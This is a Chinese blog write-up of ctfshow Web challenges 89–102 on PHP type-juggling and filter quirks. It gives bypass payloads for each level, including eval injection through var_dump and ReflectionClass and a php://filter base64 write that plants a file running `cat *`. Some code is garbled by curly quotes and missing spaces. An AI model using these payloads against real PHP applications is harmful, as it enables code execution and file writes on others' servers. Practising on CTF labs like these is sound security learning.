ctf中的web的PHP问题,Ctfshow Web入门 - PHP特性(89-102)

最新推荐文章于 2023-07-04 21:40:18 发布
最新推荐文章于 2023-07-04 21:40:18 发布
阅读量1k 收藏 2
点赞数
文章标签: ctf中的web的PHP问题

Web89

include("flag.php");highlight_file(__FILE__);if(isset($_GET[‘num‘])){$num = $_GET[‘num‘];if(preg_match("/[0-9]/", $num)){die("no no no!");

}if(intval($num)){echo $flag;

}

}

num数组绕过

?num[]=0

Web90

include("flag.php");highlight_file(__FILE__);if(isset($_GET[‘num‘])){$num = $_GET[‘num‘];if($num==="4476"){die("no no no!");

}if(intval($num,0)===4476){echo $flag;

}else{echo intval($num,0);

}

}

20201122130022135308.jpg

base为0,在传参时添加0x绕过

?num=0x117c

Web91

show_source(__FILE__);include(‘flag.php‘);$a=$_GET[‘cmd‘];if(preg_match(‘/^php$/im‘, $a)){if(preg_match(‘/^php$/i‘, $a)){echo ‘hacker‘;

}else{echo $flag;

}

}else{echo ‘nonononono‘;

}

字符 ^ 和 $ 同时使用时,表示精确匹配

/i匹配大小写,/m匹配换行,一般不加/m是不匹配换行以后的左右两端的内容

由于匹配是要以php开头,我们可以在php之前加上换行绕过

?cmd=%0aphp

Web92-95

解法相似

1.利用90题中intval的特性使用不同进制绕过

2.多了一句判断

if(!strpos($num, "0")){die("no no no!!!");

}

20201122130022166558.jpg

看似没法继续用八进制绕过,其实使用非数字符号可以绕过,让查找返回false

}else

echo("yes!")?>

payload举例:

?num=%20010574

Web96

if(isset($_GET[‘u‘])){if($_GET[‘u‘]==‘flag.php‘){die("no no no");

}else{highlight_file($_GET[‘u‘]);

}

没想到啥,看payload是加./绕过的,读取当前目录下

Web97

include("flag.php");highlight_file(__FILE__);if (isset($_POST[‘a‘]) and isset($_POST[‘b‘])) {if ($_POST[‘a‘] != $_POST[‘b‘])if (md5($_POST[‘a‘]) === md5($_POST[‘b‘]))echo $flag;else

print ‘Wrong.‘;

}

但这里没法实现,原因不明

拿数组可以绕过a[]=1&b[]=2

20201122130022213433.jpg

Web98

include("flag.php");$_GET?$_GET=&$_POST:‘flag‘;$_GET[‘flag‘]==‘flag‘?$_GET=&$_COOKIE:‘flag‘;$_GET[‘flag‘]==‘flag‘?$_GET=&$_SERVER:‘flag‘;highlight_file($_GET[‘HTTP_FLAG‘]==‘flag‘?$flag:__FILE__);

html的三元运算符

$_GET?$_GET=&$_POST:‘flag‘;

表示如果GET传参,则用POST传参flag覆盖

$_GET[‘flag‘]==‘flag‘?$_GET=&$_COOKIE:‘flag‘;

同理如果GET传参是flag字符串,则用cookie传参的flag覆盖

以下同理

$_GET[‘flag‘]==‘flag‘?$_GET=&$_SERVER:‘flag‘;

highlight_file($_GET[‘HTTP_FLAG‘]==‘flag‘?$flag:__FILE__);

如果传参的HTTP_FLAG为flag字符串,则读取flag文件,最后highlight显示

就是说GET要传参,但不能传flag,要拿POST的HTTP_FLAG传flag

Web99

highlight_file(__FILE__);$allow = array();for ($i=36; $i < 0x36d; $i++) {array_push($allow, rand(1,$i));

}if(isset($_GET[‘n‘]) && in_array($_GET[‘n‘], $allow)){file_put_contents($_GET[‘n‘], $_POST[‘content‘]);

}

20201122130022244683.jpg

20201122130022275933.jpg

20201122130022307183.jpg

20201122130022354058.jpg

首先是定义一个数组,然后向数组里面插入随机数,当GET传参的内容符合数组里随机数时,向传参名字的文件里写入POST的content内容

不是很懂怎么解法,看了hint

//in_array()函数有漏洞 没有设置第三个参数 就可以形成自动转换

//eg:n=1.php自动转换为1

就是说in_array()的type没有设置为true,则不存在的值会不检测,自动转换

20201122130022385308.jpg

20201122130022432183.jpg

20201122130022463433.jpg

Web100

highlight_file(__FILE__);include("ctfshow.php");//flag in class ctfshow;

$ctfshow = newctfshow();$v1=$_GET[‘v1‘];$v2=$_GET[‘v2‘];$v3=$_GET[‘v3‘];$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);if($v0){if(!preg_match("/\;/", $v2)){if(preg_match("/\;/", $v3)){eval("$v2(‘ctfshow‘)$v3");

}

}

}

ctfshow类开辟空间,提示我们flag在ctfshow类里面

看了代码有迷惑我们的$v2(‘ctfshow‘)$v3,其中v2肯定是命令,v3传分号

v0是三个值相与,v2和v3不传数字和v1数字相与就为1

payload:

?v1=1&v2=var_dump($ctfshow)&v3=;

或者v3直接用内联注释注释掉

?v1=1&v2=var_dump($ctfshow)/*&v3=*/;

20201122130022510308.jpg

到这一步看不懂编码问题,问了出题人才知道,替换0x2d(十六进制ASCII的‘-’符号)

Web101

include("ctfshow.php");//flag in class ctfshow;

$ctfshow = newctfshow();$v1=$_GET[‘v1‘];$v2=$_GET[‘v2‘];$v3=$_GET[‘v3‘];$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);if($v0){if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\‘|\,|\.|\;|\?|[0-9]/", $v2)){if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\‘|\,|\.|\?|[0-9]/", $v3)){eval("$v2(‘ctfshow‘)$v3");

}

}

}

过滤了很多符号,不能用var_dump输出信息

看了hint考的是类反射

PHP Reflection API是PHP5才有的新功能,它是用来导出或提取出关于类、方法、属性、参数等的详细信息,包括注释。

$class = new ReflectionClass(‘Person‘); // 建立 Person这个类的反射类

$instance = $class->newInstanceArgs($args); // 相当于实例化Person 类

构造语句导出类信息

?v1=1&v2=echo new Reflectionclass&v3=;

Web102

highlight_file(__FILE__);$v1 = $_POST[‘v1‘];$v2 = $_GET[‘v2‘];$v3 = $_GET[‘v3‘];$v4 = is_numeric($v2) and is_numeric($v3);if($v4){$s = substr($v2,2);$str = call_user_func($v1,$s);echo $str;file_put_contents($v3,$str);

}else{die(‘hacker‘);

}

substr截取字符串

20201122130022541558.jpg

call_user_func等于调用方法或变量

20201122130022604058.jpg

hint:

GET

v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64-

decode/resource=2.php

POST

v1=hex2bin#访问2.php后查看源代码获得flag

file_put_contents($v3,$str);

上面语句中,v3是我们可以控制的协议流

用base64解码写入文件,在文件包含遇到过

v2传的值,通过解码(4字节一组),能绕过substr的截断

再由v1传的hex2bin函数进行转换,存入2.php

20201122130022682183.jpg

20201122130022775933.jpg

可见这里绕过了substr

PD89YGNhdCAqYDs

=`cat *`;

还有个问题是v4

20201122130022838433.jpg

测试中如果是字符串,is_numeric是不返回值或者返回false,不会返回任何数字的,所以只要v2是数字,v4与运算以后就是1

原文:https://www.cnblogs.com/echoDetected/p/13999517.html

CodeMaster
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfweb题型找到php后怎么做,CTFweb总结
weixin_39521009的博客
04-01 2656
身为一只web小白,但也刷了不少CTF方面的web题,趁着今天有时间,坐下来总结一下关于web的解题方法。0x01 直接查看源代码解题方法:点击右键,查看页面源代码将hidden改为text,value=0改为value=1,点击Enter。出现下图:这段代码的意思就是,将我们传给PIN的值给a,如果a=-1982774773616112831283716166172777371616672727...
ctf web基础php
qq_61988806的博客
09-19 540
1.数组绕过?zx[]=admin2.换行符绕过?3.利用PCRE回溯次数限制绕过这里is_arry过滤数组。
web ctf php,CTF-WEB-PHP相关利用技术简单总结
weixin_39848970的博客
03-22 196
[PHP相关]基础知识补漏php是一种弱类型语言,它支持的类型有:boolean,integer,float,string,array,object,callable,resource,NULL类型之间转换可能会发生一些有趣的事情,总结如下:转化成boolean""(空字符串),"0"(字符串零),0(整型零),0.0(浮点零),array()(空数组),NULL,$a(尚未被赋值的变量)都会被认...
CTFPHP
SingWeek
07-26 2633
CTFPHPPHP环境及基础变量PHP漏洞函数1、sha1 和 md5 函数2、ereg()函数漏洞:00截断2、变量本身的key4、extract()变量覆盖5、strcmp()漏洞6、is_numeric()函数7、preg_match函数漏洞8、parse_str函数漏洞9、字符串比较10、unset()函数漏洞11、intval()函数漏洞12、switch()函数13、in_array()函数14、serialize() 和 unserialize()函数漏洞 PHP环境及基础 使用phpstu
ctfweb小白必备php基础知识
qq_48511129的博客
02-03 1145
本篇文章对ctfweb小白很有用,请耐心看完 <? php echo 'hello,world'; ?> <?php表示程序开始,?>表示程序结束 每行代码必须以分号结尾。 echo是php的输出函数 <?php $a=3; $b=4; $c=$a+$b; echo "$a+$b="."$c"; ?> 变量以$符号开头,变量名称对大小写敏感。 可以直接通过赋值来指定变量类型。 双引号的变量会被解析执行。 点好.用于连接字符串。 p
CTF-Web-Challenge:使用PHPWeb进行CTF挑战
03-25
CTF-网络挑战使用PHPWeb进行CTF挑战链接: :
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow-VIP题目-Web-详细解题思路
最新发布
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-WEB入门DOC-2019版1
08-03
1. 明确自己打CTF是为了娱乐,还是为了以后的工作发展 2. 如果是为了工作,那么需要一颗非常有毅力的心 3. 做好放弃周末休息时间的准备 4. 你的绝大多数
ctf-攻防世界-web:simple_php
一只菜鸟的博客
11-07 729
打开后是一段很简短的PhP代码,让我来剖析一下: 以get形式传入a,b的值,要求:a等于零还不能为0,b不能是数字但要大于1234. 那我们将传入a=a00&b=12345a即可获得flag 这就需要一点点代码知识了。 php的弱类型比较:(以下内容来源于网络,来源不可考,侵删) PHP是一种弱类型的语言,对于数字0和空字符串在进行布尔运算的时候都会转换为false; ==会自动转换类型然后进行比较,比如字符串'0'和数字0比较的时候会返回true; 而...
CTF】攻防世界——PHP2(web
x1a0he1的博客
07-28 1497
打开网页,只有这样一句话。源码里没有注释,没有<head>,响应包里也没什么信息。 御剑扫目录,扫出index.phps 这里的原理是php有很多后缀名都可以正确解析,这点通常用于绕过文件上传的黑名单限制。结合题目php2也可以想到这一点,不过phps我是真的不知道,所以手工没测出来。 访问获得源码,测试?id=admin可知是index.php的源码 接着分析下面的代码,可...
所见所得php网页,Pwnium CTF之所见所得所想
weixin_34800976的博客
04-01 125
【TSRC编者按】腾讯安全心的年轻小伙伴们早就眼馋上次的BCTF比赛了,但是由于时间关系未能参加,十分遗憾。听说pwnium CTF比赛要开始了,于是他们摩拳擦掌,跃跃欲试。这不,他们牛刀小试,在近千支参赛队伍取得并列20的名次(在包括了台湾地区的国队伍,并列第二)。小伙伴把心得体会写出来分享。HITCONCFT 2014,你们来比试比试啊。顺便说下,“人生如果没有梦想,那和咸鱼有什么区别...
php如何打网页ctf,【CTF 攻略】如何绕过四个字符限制getshell
weixin_28729331的博客
03-17 663
预估稿费:400RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言本文主要整理如何巧用Linux命令绕过命令注入点的字符数量限制,内容围绕HITCON CTF 2017 的两道题展开,先讲五个字符的限制,再讲四个字符的。在此感谢下主办方分享这么有趣的点子。热身问题的起源是 HITCON CTF 2017 的 BabyFirst Revenge 题,题目的主要代码如下:B...
CTFhtml解析php,i春秋——“百度杯”CTF比赛 九月场——123(Apache解析pht,phtml,php3等 php别名) Web程序 - 贪吃蛇学院-专业IT技术平台...
weixin_30762173的博客
03-22 194
网页源码提示用户信息在user.php,直接访问是不会有显示的,于是查找相应的备份文件,vim交换文件等,最后发现/user.php.bak 用burp采用如下配置开始爆破 最后爆破出两个账号 登录之后查看源码,发现一个被注释的表单,看似应该存在文件上传漏洞,在页面按F12,更改网页,去掉注释 本来想上传一句话的,但是发现就算上传普通图片文件和图片文件名也会提示文件名非法,猜想这里并不是真...
ctf-web-newphp
god_001的博客
04-30 627
题目地址:跳转提示 打开题目网址后,发现出现一段php代码: <?php // php版本:5.4.44 header("Content-type: text/html; charset=utf-8"); highlight_file(__FILE__); class evil{ public $hint; public function __construct($hint){ $this->hint = $hint; } pu.
hackinglab脚本关第8关-代码审计(详细)
maple_leaf
07-04 76
由于使用到file_get_contents()函数,它将整个文件读成一个字符串,所以我们考虑使用到伪协议。这道题只能从代码审计的角度去看源码,然后根据相应的规则,构造出符合的payload。由于水平有限,写的可以不是很好,欢迎大佬指教。发现源代码被html实体编码了,还原一下。
[CTFSHOW]PHP特性
Huamang的博客
03-19 1736
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 利用数组绕过:/?num[]=0 web 90 include
【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议】
等风来
05-22 9426
PHP 语言一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统的文件,可以在 web 页面链接到本地文件,或者读取本地文件的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值